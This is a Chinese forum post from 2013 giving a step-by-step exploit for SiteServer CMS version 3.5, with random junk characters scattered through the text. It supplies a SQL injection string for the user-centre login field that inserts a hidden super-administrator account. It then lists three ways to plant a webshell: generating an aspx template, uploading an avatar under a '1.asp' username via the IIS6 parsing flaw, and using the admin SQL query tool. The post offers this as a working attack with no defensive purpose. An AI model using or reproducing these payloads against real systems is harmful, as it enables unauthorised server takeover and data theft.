经测试秒杀最新的3.5版 o: D1 Q! G2 C" z' B4 m* R3 O" ?
stieserver官网:www.siteserver.cn
2 _" y8 W" I. _, k0 u0 H: ^2 S6 l$ ZEXP:
5 y0 D4 w: ]0 K; F9 s' l直接访问UserCenter/login.aspx- l u4 m% h; U: j% R
用户名处输入:/ l. i. b v$ W! C0 u9 _$ P# I
( H5 V) n' e; ~2 L3 [123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
0 _5 S" r* d4 ?" ^2 t) @2 c密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
! z$ z6 R8 g& N: n9 h7 L0 n2 h之后再访问后台SiteServer/login.aspx用插入的用户登陆( g4 @7 j9 m2 X4 e, Y9 a
后台拿webshell的三种方法:
: k- m* T* d6 r6 I一、" e- d" i; E9 S4 L0 i& X
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
- b3 ~& ?- c# F% p @2 S二、7 I/ x, |* s, ~9 n/ C
成员权限-》添加用户-》用户名为:1.asp, q p, X' m ]+ x& ]) X
http://127.0.0.1/usercenter/+ W9 J" }+ i( W ~7 j0 _2 c
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
# d$ {5 M& a* w1 d2 S2 B$ Y( p(ps:后台添加用户时不会验证是否含有非法字符)" C* S) b/ K2 X% S* F; j
三、+ {4 F: f4 a( c8 q4 t0 G" Z: t# d
系统工具-》实用工具-》机器参数查看
( o' y: `7 G% Z0 T* R T可以看到数据库类型、名称,WEB路径
4 Z" x J: c& a9 E系统工具-》数据库工具-》SQL语句查询1 ~; U. r4 M% ?" r
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对